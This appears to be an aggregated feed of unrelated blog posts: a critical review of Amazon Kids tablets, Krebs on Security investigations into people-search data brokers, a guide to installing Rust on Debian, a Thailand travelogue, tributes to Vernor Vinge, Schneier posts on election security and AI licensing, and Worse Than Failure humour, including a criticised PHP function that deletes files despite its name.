The Amazon Kids “parental controls” are extremely insufficient, and I strongly advise against getting any of the Amazon Kids series.

The initial permise (and some older reviews) look okay: you can set some time limits, and you can disable anything that requires buying. With the hardware you get one year of the “Amazon Kids+” subscription, which includes a lot of interesting content such as books and audio, but also some apps. This seemed attractive: some learning apps, some decent games. Sometimes there seems to be a special “Amazon Kids+ edition”, supposedly one that has advertisements reduced/removed and no purchasing.

However, there are so many things just wrong in Amazon Kids:

  • you have no control over the starting page of the tablet.
    it is entirely up to Amazon to decide which contents are for your kid, and of course the page is as poorly made as possible
  • the main content control is a simple age filter
    age appropriateness is decided by Amazon in a non-transparent way
  • there is no preview. All you get is one icon and a truncated title, no description, no screenshots, nothing.
  • time restrictions are on the most basic level possible (daily limit for weekdays and weekends), largely unusable
    no easy way to temporarily increase the limit by 30 minutes, for example. You end up disabling it all the time.
  • there is some “educational goals” thing, but as you do not get to control what is educational and what not, it is paperweight
  • no per-app limits
    this is a killer missing feature.
  • removing content is a very manual thing. You have to go through potentially thousands of entries, and disable them one-by-one for every kid.
  • some contents cannot even be removed anymore
    “managed by age filters and cannot be changed” - these appear to be HTML5 and not real apps
  • there is no whitelist!
    That is the really no-go. By using Amazon Kids, you fully expose your kids to the endless rabbit hole of apps.
  • you cannot switch to an alternate UI that has better parental controls
    without sideloading, you cannot even get YouTube Kids (which still is not really good either) on it, as it does not have Google services.
    and even with sideloading, you do not appear to be able to permanently replace the launcher anymore.

And, unfortunately, Amazon Kids is full of poor content for kids, such as “DIY Fashion Star” that I consider to be very dangerous for kids: it is extremely stereotypical, beginning with supposedly “female” color schemes, model-only body types, and judging people by their clothing (and body).

You really thought you could hand-pick suitable apps for your kid on your own?

No, you have to identify and remove such contents one by one, with many clicks each, because there is no whitelisting, and no mass-removal (anymore - apparently Amazon removed the workarounds that previously allowed you to mass remove contents).

Not with Amazon Kids+, which apparently aims at raising the next generation of zombie customers that buy whatever you tell them to buy.

Hence, do not get your kids an Amazon Fire HD tablet!

365 TomorrowsMississauga

Author: Jeremy Nathan Marks I live in Mississauga, a city that builds dozens of downtown towers every year, the finest towers in the world. Each morning, I watch cranes move like long legged birds along the pond of the horizon. They bow and raise their heads, plucking at things which they lift toward the heavens […]

The post Mississauga appeared first on 365tomorrows.

Planet DebianValhalla's Things: Forgotten Yeast Bread - Sourdough Edition

Posted on March 23, 2024
Tags: madeof:atoms, craft:cooking, craft:baking, craft:bread

Yesterday I had planned a pan sbagliato for today, but I also had quite a bit of sourdough to deal with, so instead of mixing a bit of of dry yeast at 18:00 and mixing it with some additional flour and water at 21:00, at around maybe 20:00 I substituted:

  • 100 g firm sourdough;
  • 33 g flour;
  • 66 g water.

Then I briefly woke up in the middle of the night and poured the dough on the tray at that time instead of having to wake up before 8:00 in the morning.

Everything else was done as in the original recipe.

The firm sourdough is feeded regularly with the same weight of flour and half the weight of water.

Will. do. again.

,

Krebs on SecurityMozilla Drops Onerep After CEO Admits to Running People-Search Networks

The nonprofit organization that supports the Firefox web browser said today it is winding down its new partnership with Onerep, an identity protection service recently bundled with Firefox that offers to remove users from hundreds of people-search sites. The move comes just days after a report by KrebsOnSecurity forced Onerep’s CEO to admit that he has founded dozens of people-search networks over the years.

Mozilla Monitor. Image Mozilla Monitor Plus video on Youtube.

Mozilla only began bundling Onerep in Firefox last month, when it announced the reputation service would be offered on a subscription basis as part of Mozilla Monitor Plus. Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned? to let users know when their email addresses or password are leaked in data breaches.

On March 14, KrebsOnSecurity published a story showing that Onerep’s Belarusian CEO and founder Dimitiri Shelest launched dozens of people-search services since 2010, including a still-active data broker called Nuwber that sells background reports on people. Onerep and Shelest did not respond to requests for comment on that story.

But on March 21, Shelest released a lengthy statement wherein he admitted to maintaining an ownership stake in Nuwber, a consumer data broker he founded in 2015 — around the same time he launched Onerep.

Shelest maintained that Nuwber has “zero cross-over or information-sharing with Onerep,” and said any other old domains that may be found and associated with his name are no longer being operated by him.

“I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.” The full statement is available here (PDF).

Onerep CEO and founder Dimitri Shelest.

In a statement released today, a spokesperson for Mozilla said it was moving away from Onerep as a service provider in its Monitor Plus product.

“Though customer data was never at risk, the outside financial interests and activities of Onerep’s CEO do not align with our values,” Mozilla wrote. “We’re working now to solidify a transition plan that will provide customers with a seamless experience and will continue to put their interests first.”

KrebsOnSecurity also reported that Shelest’s email address was used circa 2010 by an affiliate of Spamit, a Russian-language organization that paid people to aggressively promote websites hawking male enhancement drugs and generic pharmaceuticals. As noted in the March 14 story, this connection was confirmed by research from multiple graduate students at my alma mater George Mason University.

Shelest denied ever being associated with Spamit. “Between 2010 and 2014, we put up some web pages and optimize them — a widely used SEO practice — and then ran AdSense banners on them,” Shelest said, presumably referring to the dozens of people-search domains KrebsOnSecurity found were connected to his email addresses (dmitrcox@gmail.com and dmitrcox2@gmail.com). “As we progressed and learned more, we saw that a lot of the inquiries coming in were for people.”

Shelest also acknowledged that Onerep pays to run ads on “on a handful of data broker sites in very specific circumstances.”

“Our ad is served once someone has manually completed an opt-out form on their own,” Shelest wrote. “The goal is to let them know that if they were exposed on that site, there may be others, and bring awareness to there being a more automated opt-out option, such as Onerep.”

Reached via Twitter/X, HaveIBeenPwned founder Troy Hunt said he knew Mozilla was considering a partnership with Onerep, but that he was previously unaware of the Onerep CEO’s many conflicts of interest.

“I knew Mozilla had this in the works and we’d casually discussed it when talking about Firefox monitor,” Hunt told KrebsOnSecurity. “The point I made to them was the same as I’ve made to various companies wanting to put data broker removal ads on HIBP: removing your data from legally operating services has minimal impact, and you can’t remove it from the outright illegal ones who are doing the genuine damage.”

Playing both sides — creating and spreading the same digital disease that your medicine is designed to treat — may be highly unethical and wrong. But in the United States it’s not against the law. Nor is collecting and selling data on Americans. Privacy experts say the problem is that data brokers, people-search services like Nuwber and Onerep, and online reputation management firms exist because virtually all U.S. states exempt so-called “public” or “government” records from consumer privacy laws.

Those include voting registries, property filings, marriage certificates, motor vehicle records, criminal records, court documents, death records, professional licenses, and bankruptcy filings. Data brokers also can enrich consumer records with additional information, by adding social media data and known associates.

The March 14 story on Onerep was the second in a series of three investigative reports published here this month that examined the data broker and people-search industries, and highlighted the need for more congressional oversight — if not regulation — on consumer data protection and privacy.

On March 8, KrebsOnSecurity published A Close Up Look at the Consumer Data Broker Radaris, which showed that the co-founders of Radaris operate multiple Russian-language dating services and affiliate programs. It also appears many of their businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

On March 20, KrebsOnSecurity published The Not-So-True People-Search Network from China, which revealed an elaborate web of phony people-search companies and executives designed to conceal the location of people-search affiliates in China who are earning money promoting U.S. based data brokers that sell personal information on Americans.

Worse Than FailureError'd: You Can Say That Again!

In a first for me, this week we got FIVE unique submissions of the exact same bug on LinkedIn. In the spirit of the theme, I dug up a couple of unused submissions of older problems at LinkedIn as well. I guess there are more than the usual number of tech people looking for jobs.

John S., Chris K., Peter C., Brett Nash and Piotr K. all sent in samples of this doublebug. It's a flubstitution AND bad math, together!

minus

 

Latin Steevie is also job hunting and commented "Well, I know tech-writers may face hard times finding a job, so they turn to LinkedIn, which however doesn't seem to help... (the second announcement translates to 'part-time cleaners wanted') As a side bonus, apparently I can't try a search for jobs outside Italy, which is quite odd, to say the least!"

techwr

 

Clever Drew W. found a very minor bug in their handling of non-ASCII names. "I have an emoji in my display name on LinkedIn to thwart scrapers and other such bots. I didn't think it would also thwart LinkedIn!"

emoji

 

Finally, Mark Whybird returns with an internal repetition. "I think maybe I found the cause of some repetitive notifications when I went to Linkedin's notifications preferences page?" I think maybe!

third

 

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

365 TomorrowsArtificial Gravity

Author: TJ Gadd Anna stared at where the panel had been. Joshua was right; either The Saviour had never left Earth, or Anna had broken into a vault full of sand. She carefully replaced the panel, resetting every rivet. Her long red hair hid her pretty face. When astronomers first identified a comet heading towards […]

The post Artificial Gravity appeared first on 365tomorrows.

xkcdThe Wreck of the Edmund Fitzgerald

Planet DebianReproducible Builds (diffoscope): diffoscope 261 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 261. This version includes the following changes:

[ Chris Lamb ]
* Don't crash if we encounter an .rdb file without an equivalent .rdx file.
  (Closes: #1066991)
* In addition, don't identify Redis database dumps (etc.) as GNU R database
  files based simply on their filename. (Re: #1066991)
* Update copyright years.

You find out more by visiting the project homepage.

,

Planet DebianIan Jackson: How to use Rust on Debian (and Ubuntu, etc.)

tl;dr: Don’t just apt install rustc cargo. Either do that and make sure to use only Rust libraries from your distro (with the tiresome config runes below); or, just use rustup.

Don’t do the obvious thing; it’s never what you want

Debian ships a Rust compiler, and a large number of Rust libraries.

But if you just do things the obvious “default” way, with apt install rustc cargo, you will end up using Debian’s compiler but upstream libraries, directly and uncurated from crates.io.

This is not what you want. There are about two reasonable things to do, depending on your preferences.

Q. Download and run whatever code from the internet?

The key question is this:

Are you comfortable downloading code, directly from hundreds of upstream Rust package maintainers, and running it ?

That’s what cargo does. It’s one of the main things it’s for. Debian’s cargo behaves, in this respect, just like upstream’s. Let me say that again:

Debian’s cargo promiscuously downloads code from crates.io just like upstream cargo.

So if you use Debian’s cargo in the most obvious way, you are still downloading and running all those random libraries. The only thing you’re avoiding downloading is the Rust compiler itself, which is precisely the part that is most carefully maintained, and of least concern.

Debian’s cargo can even download from crates.io when you’re building official Debian source packages written in Rust: if you run dpkg-buildpackage, the downloading is suppressed; but a plain cargo build will try to obtain and use dependencies from the upstream ecosystem. (“Happily”, if you do this, it’s quite likely to bail out early due to version mismatches, before actually downloading anything.)

Option 1: WTF, no I don’t want curl|bash

OK, but then you must limit yourself to libraries available within Debian. Each Debian release provides a curated set. It may or may not be sufficient for your needs. Many capable programs can be written using the packages in Debian.

But any upstream Rust project that you encounter is likely to be a pain to get working, unless their maintainers specifically intend to support this. (This is fairly rare, and the Rust tooling doesn’t make it easy.)

To go with this plan, apt install rustc cargo and put this in your configuration, in $HOME/.cargo/config.toml:

[source.debian-packages]
directory = "/usr/share/cargo/registry"
[source.crates-io]
replace-with = "debian-packages"

This causes cargo to look in /usr/share for dependencies, rather than downloading them from crates.io. You must then install the librust-FOO-dev packages for each of your dependencies, with apt.

This will allow you to write your own program in Rust, and build it using cargo build.

Option 2: Biting the curl|bash bullet

If you want to build software that isn’t specifically targeted at Debian’s Rust you will probably need to use packages from crates.io, not from Debian.

If you’re doing to do that, there is little point not using rustup to get the latest compiler. rustup’s install rune is alarming, but cargo will be doing exactly the same kind of thing, only worse (because it trusts many more people) and more hidden.

So in this case: do run the curl|bash install rune.

Hopefully the Rust project you are trying to build have shipped a Cargo.lock; that contains hashes of all the dependencies that they last used and tested. If you run cargo build --locked, cargo will only use those versions, which are hopefully OK.

And you can run cargo audit to see if there are any reported vulnerabilities or problems. But you’ll have to bootstrap this with cargo install --locked cargo-audit; cargo-audit is from the RUSTSEC folks who do care about these kind of things, so hopefully running their code (and their dependencies) is fine. Note the --locked which is needed because cargo’s default behaviour is wrong.

Privilege separation

This approach is rather alarming. For my personal use, I wrote a privsep tool which allows me to run all this upstream Rust code as a separate user.

That tool is nailing-cargo. It’s not particularly well productised, or tested, but it does work for at least one person besides me. You may wish to try it out, or consider alternative arrangements. Bug reports and patches welcome.

OMG what a mess

Indeed. There are large number of technical and social factors at play.

cargo itself is deeply troubling, both in principle, and in detail. I often find myself severely disappointed with its maintainers’ decisions. In mitigation, much of the wider Rust upstream community does takes this kind of thing very seriously, and often makes good choices. RUSTSEC is one of the results.

Debian’s technical arrangements for Rust packaging are quite dysfunctional, too: IMO the scheme is based on fundamentally wrong design principles. But, the Debian Rust packaging team is dynamic, constantly working the update treadmills; and the team is generally welcoming and helpful.

Sadly last time I explored the possibility, the Debian Rust Team didn’t have the appetite for more fundamental changes to the workflow (including, for example, changes to dependency version handling). Significant improvements to upstream cargo’s approach seem unlikely, too; we can only hope that eventually someone might manage to supplant it.

edited 2024-03-21 21:49 to add a cut tag



comment count unavailable comments

Planet DebianRavi Dwivedi: Thailand Trip

This post is the second and final part of my Malaysia-Thailand trip. Feel free to check out the Malaysia part here if you haven’t already. Kuala Lumpur to Bangkok is around 1500 km by road, and so I took a Malaysian Airlines flight to travel to Bangkok. The flight staff at the Kuala Lumpur only asked me for a return/onward flight and Thailand immigration asked a few questions but did not check any documents (obviously they checked and stamped my passport ;)). The currency of Thailand is the Thai baht, and 1 Thai baht = 2.5 Indian Rupees. The Thailand time is 1.5 hours ahead of Indian time (For example, if it is 12 noon in India, it will be 13:30 in Thailand).

I landed in Bangkok at around 3 PM local time. Fletcher was in Bangkok that time, leaving for Pattaya and we had booked the same hostel. So I took a bus to Pattaya from the airport. The next bus for which the tickets were available was at 7 PM, so I took tickets for that one. The bus ticket cost was 143 Thai Baht. I didn’t buy SIM at the airport, thinking there must be better deals in the city. As a consequence, there was no way to contact Fletcher through internet. Although I had a few minutes call remaining out of my international roaming pack.

A welcome sign at Bangkok's Suvarnabhumi airport.

Bus from Suvarnabhumi Airport to Jomtien Beach in Pattaya.

Our accommodation was near Jomtien beach, so I got off at the last stop, as the bus terminates at the Jomtien beach. Then I decided to walk towards my accommodation. I was using OsmAnd for navigation. However, the place was not marked on OpenStreetMap, and it turned out I missed the street my hostel was on and walked around 1 km further as I was chasing a similarly named incorrect hostel on OpenStreetMap. Then I asked for help from two men sitting at a café. One of them said he will help me find the street my hostel is on. So, I walked with him, and he told me he lives in Thailand for many years, but he is from Kuwait. He also gave me valuable information. Like, he told me about shared hail-and-ride songthaews which run along the Jomtien Second Road and charge 10 Baht for any distance on their route. This tip significantly reduced our expenses. Further, he suggested me 7-Eleven shops for buying a local SIM. Like Malaysia, Thailand has 24/7 7-Eleven convenience stores, a lot of them not even 100 m apart.

The Kuwaiti person dropped me at the address where my hostel was. I tried searching for a person in-charge of that hostel, and soon I realized there was no reception. After asking for help from locals for some time, I bumped into Fletcher, who also came to this address and was searching for the same. After finding a friend, I felt a sigh of relief. Adjacent to the property, there was a hairdresser shop. We went there and asked about this property. The woman called the owner, and she also told us the required passcodes to go inside. Our accommodation was in a room on the second floor, which required us to put a passcode for opening. We entered the passcode and entered the room. So, we stayed at this hostel which had no reception. Due to this, it took 2 hours to find our room and enter. It reminded me of a difficult experience I had in Albania, where me and Akshat were not able to find our apartment in one of the hottest days and the owner didn’t know our language.

Traveling from the place where the bus dropped me to the hostel, I saw streets were filled with bars and massage parlors, which was expected. Prostitutes were everywhere. We went out at night towards the beach and also roamed around in 7-Elevens to buy a SIM card for myself. I got a SIM for 7 day unlimited internet for 399 baht. Turns out that the rates of SIM cards at the airport were not so different from inside the city.

Road near Jomtien beach in Pattaya

Photo of a songthaew in Pattaya. There are shared songthaews which run along Jomtien Second road and takes 10 bath to anywhere on the route.

Jomtien Beach in Pattaya.

In terms of speaking English, locals didn’t know English at all in both Pattaya and Bangkok. I normally don’t expect locals to know English in a non-English speaking country, but the fact that Bangkok is one of the most visited places by tourists made me expect locals to know some English. Talking to locals is an integral part of travel for me, which I couldn’t do a lot in Thailand. This aspect is much more important for me than going to touristy places.

So, we were in Pattaya. Next morning, Fletcher and I went to Tiger park using shared songthaew. After that, we planned to visit Pattaya Floating market which is near the Tiger Park, but we felt the ticket prices were higher than it was worth. Fletcher had to leave for Bangkok on that day. I suggested him to go to Suvarnabhumi Airport from the Jomtien beach bus terminal (this was the route I took the last day in opposite direction) to avoid traffic congestion inside Bangkok, as he can follow up with metro once he reaches the airport. From the floating market, we were walking in sweltering heat to reach the Jomtien beach. I tried asking for a lift and eventually got successful as a scooty stopped, and surprisingly the person gave a ride to both of us. He was from Delhi, so maybe that’s the reason he stopped for us. Then we took a songthaew to the bus terminal and after having lunch, Fletcher left for Bangkok.

A welcome sign at Pattaya Floating market.

This Korean Vegetasty noodles pack was yummy and was available at many 7-Eleven stores.

Next day I went to Bangkok, but Fletcher already left for Kuala Lumpur. Here I had booked a private room in a hotel (instead of a hostel) for four nights, mainly because of my luggage. This costed 5600 INR for four nights. It was 2 km from the metro station, which I used to walk both sides. In Bangkok, I visited Sukhumvit and Siam by metro. Going to some areas require crossing the Chao Phraya river. For this, I took Chao Phraya Express Boat for going to places like Khao San road and Wat Arun. I would recommend taking the boat ride as it had very good views. In Bangkok, I met a person from Pakistan staying in my hotel and so here also I got some company. But by the time I met him, my days were almost over. So, we went to a random restaurant selling Indian food where we ate some paneer dish with naan and that restaurant person was from Myanmar.

Wat Arun temple stamps your hand upon entry

Wat Arun temple

Khao San Road

A food stall at Khao San Road

Chao Phraya Express Boat

For eating, I mainly relied on fruits and convenience stores. Bananas were very tasty. This was the first time I saw banana flesh being yellow. Mangoes were delicious and pineapples were smaller and flavorful. I also ate Rose Apple, which I never had before. I had Chhole Kulche once in Sukhumvit. That was a little expensive as it costed 164 baht. I also used to buy premix coffee packets from 7-Eleven convenience stores and prepare them inside the stores.

Banana with yellow flesh

Fruits at a stall in Bangkok

Trimmed pineapples from Thailand.

Corn in Bangkok.

A board showing coffee menu at a 7-Eleven store along with rates in Pattaya.

In this section of 7-Eleven, you can buy a premix coffee and mix it with hot water provided at the store to prepare.

My booking from Bangkok to Delhi was in Air India flight, and they were serving alcohol in the flight. I chose red wine, and this was my first time having alcohol in a flight.

Red wine being served in Air India

Notes

  • In this whole trip spanning two weeks, I did not pay for drinking water (except for once in Pattaya which was 9 baht) and toilets. Bangkok and Kuala Lumpur have plenty of malls where you should find a free-of-cost toilet nearby. For drinking water, I relied mainly on my accommodation providing refillable water for my bottle.

  • Thailand seemed more expensive than Malaysia on average. Malaysia had discounted price due to the Chinese New year.

  • I liked Pattaya more than Bangkok. Maybe because Pattaya has beach and Bangkok doesn’t. Pattaya seemed more lively, and I could meet and talk to a few people as opposed to Bangkok.

  • Chao Phraya River express boat costs 150 baht for one day where you can hop on and off to any boat.

David BrinVernor Vinge - the Man with Lamps on His Brows

They said it of Moses - that he had 'lamps on his brows.' That he could peer ahead, through the fog of time. That phrase is applied now to the Prefrontal Lobes, just above the eyes - organs that provide humans our wan powers of foresight. Wan... except in a few cases, when those lamps blaze! Shining ahead of us, illuminating epochs yet to come.


Greg Bear, Gregory Benford, David Brin, Vernor Vinge


Alas, such lights eventually dim. And so, it is with sadness - and deep appreciation of my friend and colleague - that I must report the passing of Vernor Vinge. A titan in the literary genre that explores a limitless range of potential destinies, Vernor enthralled millions with tales of plausible tomorrows, made all the more vivid by his polymath masteries of language, drama, characters and the implications of science. 

 

Accused by some of a grievous sin - that of 'optimism' - Vernor gave us peerless legends that often depicted human success at overcoming problems... those right in front of us... while posing new ones! New dilemmas that may lie just beyond our myopic gaze. 


He would often ask: "What if we succeed? Do you think that will be the end of it?"

 

Vernor's aliens - in classics like A Deepness in the Sky and A Fire Upon the Deep - were fascinating beings, drawing us into different styles of life and paths of consciousness. 

 

His 1981 novella "True Names" was perhaps the first story to present a plausible concept of cyberspace, which would later be central to cyberpunk stories by William Gibson, Neal Stephenson and others. Many innovators of modern industry cite “True Names” as their keystone technological inspiration... though I deem it to have been even more prophetic about the yin-yang tradeoffs of privacy, transparency and accountability.  

 

Another of the many concepts arising in Vernor’s dynamic mind was that of the “Technological Singularity,” a term (and disruptive notion) that has pervaded culture and our thoughts about the looming future.

 

Rainbows End expanded these topics to include the vividly multi-layered "augmented' reality wherein we all will live, in just a few years from now. It was almost-certainly the most vividly accurate portrayal of how new generations might apply onrushing cyber-tools, boggling their parents, who will stare at their kids' accomplishments, in wonder. Wonders like a university library building that, during an impromptu rave, stands up and starts to dance!

Vinge was also a long-revered educator and professor of math and computer science at San Diego State University, mentoring generations of practical engineers to also keep a wide stance and open minds.

Vernor had been - for years - under care for progressive Parkinsons, at a very nice place overlooking the Pacific in La Jolla. As reported by his friend and fellow SDSU Prof. John Carroll, his decline had steepened since November, but was relatively comfortable. Up until that point, I had been in contact with Vernor almost weekly, but my friendship pales next to John's devotion, for which I am - (and we all should be) - deeply grateful.

 

I am a bit too wracked, right now, to write much more. Certainly, homages will flow and we will post some on a tribute page. 


I will say that it's a bit daunting now to be a "Killer B" who's still standing. So, let me close with a photo from last October, that's dear to my heart. And those prodigious brow-lamps were still shining brightly!


We spanned a pretty wide spectrum - politically! Yet, we Killer Bs - (Vernor was a full member! And Octavia Butler once guffawed happily when we inducted her) - always shared a deep love of our high art - that of gedankenexperimentation, extrapolation into the undiscovered country ahead. 


If Vernor's readers continue to be inspired - that country might even feature more solutions than problems. And perhaps copious supplies of hope.



========================================================


Addenda & tributes


“What a fine writer he was!”  -- Robert Silverberg.


“A kind man.”  -- Kim Stanley Robinson (The nicest thing anyone could say.)

 

The good news is that Vernor, and you and many other authors, will have achieved a kind of immortality thanks to your works. My favorite Vernor Vinge book was True Names." -- Vinton Cerf

 

Vernor was a good guy. -- Pat Cadigan


David Brin 2Remembering Vernor Vinge

Author of the Singularity

It is with sadness – and deep appreciation of my friend and colleague – that I must report the passing of fellow science fiction author – Vernor Vinge. A titan in the literary genre that explores a limitless range of potential destinies, Vernor enthralled millions with tales of plausible tomorrows, made all the more vivid by his polymath masteries of language, drama, characters and the implications of science.

Accused by some of a grievous sin – that of ‘optimism’ – Vernor gave us peerless legends that often depicted human success at overcoming problems… those right in front of us… while posing new ones! New dilemmas that may lie just ahead of our myopic gaze. He would often ask: “What if we succeed? Do you think that will be the end of it?”

Vernor’s aliens – in classic science fiction novels such as A Deepness in the Sky and A Fire Upon the Deep – were fascinating beings, drawing us into different styles of life and paths of consciousness.

His 1981 novella “True Names” was perhaps the first story to present a plausible concept of cyberspace, which would later be central to cyberpunk stories by William Gibson, Neal Stephenson and others. Many innovators of modern industry cite “True Names” as their keystone technological inspiration, though I deem it to have been even more prophetic about the yin-yang tradeoffs of privacy, transparency and accountability.  

Another of the many concepts arising in Vernor’s dynamic mind was that of the “Technological Singularity,” a term (and disruptive notion) that has pervaded culture and our thoughts about the looming future.

Others cite Rainbows End as the most vividly accurate portrayal of how new generations will apply onrushing cyber-tools, boggling their parents, who will stare at their kids’ accomplishments, in wonder. Wonders like a university library building that, during an impromptu rave, stands up and starts to dance!

Vernor had been – for years – under care for progressive Parkinsons, at a very nice place overlooking the Pacific in La Jolla. As reported by his friend and fellow San Diego State professor John Carroll, his decline had steepened since November, but was relatively comfortable. Up until that point, I had been in contact with Vernor almost weekly, but my friendship pales next to John’s devotion, for which I am – (and we all should be) – deeply grateful.

I am a bit too wracked, right now, to write much more. Certainly, homages will flow and we will post some on a tribute page. I will say that it’s a bit daunting now to be a “Killer B” who’s still standing. So, let me close with a photo that’s dear to my heart.

We spanned a pretty wide spectrum – politically! Yet, we Killer B’s (Vernor was a full member! And Octavia Butler once guffawed happily when we inducted her) always shared a deep love of our high art – that of gedankenexperimentation, extrapolation into the undiscovered country ahead.

And – if Vernor’s readers continue to be inspired – that country might even feature more solutions than problems. And perhaps copious supplies of hope.

Killer B’s at a book signing: Greg Bear, Gregory Benford, David Brin, Vernor Vinge

Cryptogram On Secure Voting Systems

Andrew Appel shepherded a public comment—signed by twenty election cybersecurity experts, including myself—on best practices for ballot marking devices and vote tabulation. It was written for the Pennsylvania legislature, but it’s general in nature.

From the executive summary:

We believe that no system is perfect, with each having trade-offs. Hand-marked and hand-counted ballots remove the uncertainty introduced by use of electronic machinery and the ability of bad actors to exploit electronic vulnerabilities to remotely alter the results. However, some portion of voters mistakenly mark paper ballots in a manner that will not be counted in the way the voter intended, or which even voids the ballot. Hand-counts delay timely reporting of results, and introduce the possibility for human error, bias, or misinterpretation.

Technology introduces the means of efficient tabulation, but also introduces a manifold increase in complexity and sophistication of the process. This places the understanding of the process beyond the average person’s understanding, which can foster distrust. It also opens the door to human or machine error, as well as exploitation by sophisticated and malicious actors.

Rather than assert that each component of the process can be made perfectly secure on its own, we believe the goal of each component of the elections process is to validate every other component.

Consequently, we believe that the hallmarks of a reliable and optimal election process are hand-marked paper ballots, which are optically scanned, separately and securely stored, and rigorously audited after the election but before certification. We recommend state legislators adopt policies consistent with these guiding principles, which are further developed below.

Cryptogram Licensing AI Engineers

The debate over professionalizing software engineers is decades old. (The basic idea is that, like lawyers and architects, there should be some professional licensing requirement for software engineers.) Here’s a law journal article recommending the same idea for AI engineers.

This Article proposes another way: professionalizing AI engineering. Require AI engineers to obtain licenses to build commercial AI products, push them to collaborate on scientifically-supported, domain-specific technical standards, and charge them with policing themselves. This Article’s proposal addresses AI harms at their inception, influencing the very engineering decisions that give rise to them in the first place. By wresting control over information and system design away from companies and handing it to AI engineers, professionalization engenders trustworthy AI by design. Beyond recommending the specific policy solution of professionalization, this Article seeks to shift the discourse on AI away from an emphasis on light-touch, ex post solutions that address already-created products to a greater focus on ex ante controls that precede AI development. We’ve used this playbook before in fields requiring a high level of expertise where a duty to the public welfare must trump business motivations. What if, like doctors, AI engineers also vowed to do no harm?

I have mixed feelings about the idea. I can see the appeal, but it never seemed feasible. I’m not sure it’s feasible today.

Cryptogram Google Pays $10M in Bug Bounties in 2023

BleepingComputer has the details. It’s $2M less than in 2022, but it’s still a lot.

The highest reward for a vulnerability report in 2023 was $113,337, while the total tally since the program’s launch in 2010 has reached $59 million.

For Android, the world’s most popular and widely used mobile operating system, the program awarded over $3.4 million.

Google also increased the maximum reward amount for critical vulnerabilities concerning Android to $15,000, driving increased community reports.

During security conferences like ESCAL8 and hardwea.io, Google awarded $70,000 for 20 critical discoveries in Wear OS and Android Automotive OS and another $116,000 for 50 reports concerning issues in Nest, Fitbit, and Wearables.

Google’s other big software project, the Chrome browser, was the subject of 359 security bug reports that paid out a total of $2.1 million.

Slashdot thread.

Worse Than FailureCodeSOD: Reading is a Safe Operation

Alex saw, in the company's codebase, a method called recursive_readdir. It had no comments, but the name seemed pretty clear: it would read directories recursively, presumably enumerating their contents.

Fortunately for Alex, they checked the code before blindly calling the method.

public function recursive_readdir($path)
{
    $handle = opendir($path);
    while (($file = readdir($handle)) !== false)
    {
        if ($file != '.' && $file != '..')
        {
            $filepath = $path . '/' . $file;
            if (is_dir($filepath))
            {
                rmdir($filepath);
                recursive_readdir($filepath);
            }
            else
            {
                    unlink($filepath);
            }
        }
    }
    closedir($handle);
    rmdir($path);
}

This is a recursive delete. rmdir requires the target directory to be empty, so this recurses over all the files and subfolders in the directory, deleting them, so that we can delete the directory.

This code is clearly cribbed from comments on the PHP documentation, with a fun difference in that this version is both unclearly named, and also throws an extra rmdir call in the is_dir branch- a potential "optimization" that doesn't actually do anything (it either fails because the directory isn't empty, or we end up calling it twice anyway).

Alex learned to take nothing for granted in this code base.

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

365 TomorrowsDisinformation Failure

Author: David C. Nutt The uniformed Da’Ri officer saw me enter the bar and nearly ran to me. He was at my booth before I had a chance to settle in and was talking at light speed before the first round hit the table. Things did not go well for the Da’Ri today. As an […]

The post Disinformation Failure appeared first on 365tomorrows.

Krebs on SecurityThe Not-so-True People-Search Network from China

It’s not unusual for the data brokers behind people-search websites to use pseudonyms in their day-to-day lives (you would, too). Some of these personal data purveyors even try to reinvent their online identities in a bid to hide their conflicts of interest. But it’s not every day you run across a US-focused people-search network based in China whose principal owners all appear to be completely fabricated identities.

Responding to a reader inquiry concerning the trustworthiness of a site called TruePeopleSearch[.]net, KrebsOnSecurity began poking around. The site offers to sell reports containing photos, police records, background checks, civil judgments, contact information “and much more!” According to LinkedIn and numerous profiles on websites that accept paid article submissions, the founder of TruePeopleSearch is Marilyn Gaskell from Phoenix, Ariz.

The saucy yet studious LinkedIn profile for Marilyn Gaskell.

Ms. Gaskell has been quoted in multiple “articles” about random subjects, such as this article at HRDailyAdvisor about the pros and cons of joining a company-led fantasy football team.

“Marilyn Gaskell, founder of TruePeopleSearch, agrees that not everyone in the office is likely to be a football fan and might feel intimidated by joining a company league or left out if they don’t join; however, her company looked for ways to make the activity more inclusive,” this paid story notes.

Also quoted in this article is Sally Stevens, who is cited as HR Manager at FastPeopleSearch[.]io.

Sally Stevens, the phantom HR Manager for FastPeopleSearch.

“Fantasy football provides one way for employees to set aside work matters for some time and have fun,” Stevens contributed. “Employees can set a special league for themselves and regularly check and compare their scores against one another.”

Imagine that: Two different people-search companies mentioned in the same story about fantasy football. What are the odds?

Both TruePeopleSearch and FastPeopleSearch allow users to search for reports by first and last name, but proceeding to order a report prompts the visitor to purchase the file from one of several established people-finder services, including BeenVerified, Intelius, and Spokeo.

DomainTools.com shows that both TruePeopleSearch and FastPeopleSearch appeared around 2020 and were registered through Alibaba Cloud, in Beijing, China. No other information is available about these domains in their registration records, although both domains appear to use email servers based in China.

Sally Stevens’ LinkedIn profile photo is identical to a stock image titled “beautiful girl” from Adobe.com. Ms. Stevens is also quoted in a paid blog post at ecogreenequipment.com, as is Alina Clark, co-founder and marketing director of CocoDoc, an online service for editing and managing PDF documents.

The profile photo for Alina Clark is a stock photo appearing on more than 100 websites.

Scouring multiple image search sites reveals Ms. Clark’s profile photo on LinkedIn is another stock image that is currently on more than 100 different websites, including Adobe.com. Cocodoc[.]com was registered in June 2020 via Alibaba Cloud Beijing in China.

The same Alina Clark and photo materialized in a paid article at the website Ceoblognation, which in 2021 included her at #11 in a piece called “30 Entrepreneurs Describe The Big Hairy Audacious Goals (BHAGs) for Their Business.” It’s also worth noting that Ms. Clark is currently listed as a “former Forbes Council member” at the media outlet Forbes.com.

